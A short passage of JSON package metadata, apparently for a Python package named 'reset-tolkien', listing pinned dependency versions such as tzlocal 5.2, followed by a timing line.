            "specs": [
                [
                    "==",
                    "4.12.2"
                ]
            ]
        },
        {
            "name": "tzlocal",
            "specs": [
                [
                    "==",
                    "5.2"
                ]
            ]
        }
    ],
    "lcname": "reset-tolkien"
}
        
Elapsed time: 0.41704s